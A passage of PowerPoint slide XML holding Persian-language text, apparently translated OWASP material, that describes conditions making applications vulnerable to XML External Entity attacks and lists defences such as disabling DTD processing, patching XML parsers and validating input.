                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> استفاده می کند.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SAML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برای اثبات هویت استفاده می کند و ممکن است آسیب پذیر باشد.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اگر برنامه کاربردی از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> قبل از نسخه 1.2 استفاده کند، احتمالا حساس به حملات </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XXE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>است اگر موجودیت های </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>به چارچوب </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SOAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>منتقل شوند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آسیب پذیر بودن به حملات </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XXE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> به این معنی است که برنامه به حملات اختلال سرویس، از جمله حمله </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Billion Laughs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، آسیب پذیر است.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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4"/>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fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>منابع</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5"/>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fa-IR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>خارجی</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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>چگونه ممانعت کنیم؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آموزش برنامه نویسی برای شناسایی و مقابله با </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> XXE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ضروری است. علاوه بر این، جلوگیری از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XXE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نیازمندی های زیر را دارد:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>هر زمان که امکان دارد، از فرمت های داده ای پیچیده مانند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> کمتر استفاده شود و سریال سازی اطلاعات حساس اجتناب گردد.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>وصله امنیتی یا ارتقاء تمام پردازنده های </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>و کتابخانه هایی که توسط برنامه کاربردی یا سیستم عامل اصلی استفاده می شود. از بررسی کننده های وابستگی استفاده کنید. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SOAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SOAP 1.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یا بالاتر به روز رسانی کنید.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>موجودیت خارجی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> و پردازش </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DTD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>در تمام پارسرهای</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>در برنامه را غیر فعال کنید، همانطور که در </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> غیر فعال است. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اعتبار سنجی ورودی، فیلتر کردن و یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>sanitization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> ورودی را در سمت سرور برای جلوگیری از انتقال اطلاعات خصمانه در اسناد </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XML، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>هدر ها یا گره ها پیاده سازی کنید.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>قابلیت آپلود فایل </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XSL،</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> ورودی</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>را با استفاده از اعتبارسنجی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XSD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یا مشابه آن، اعتبار سنجی کنید.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ابزارهای </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SAST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>می تواند به شناسایی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XXE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
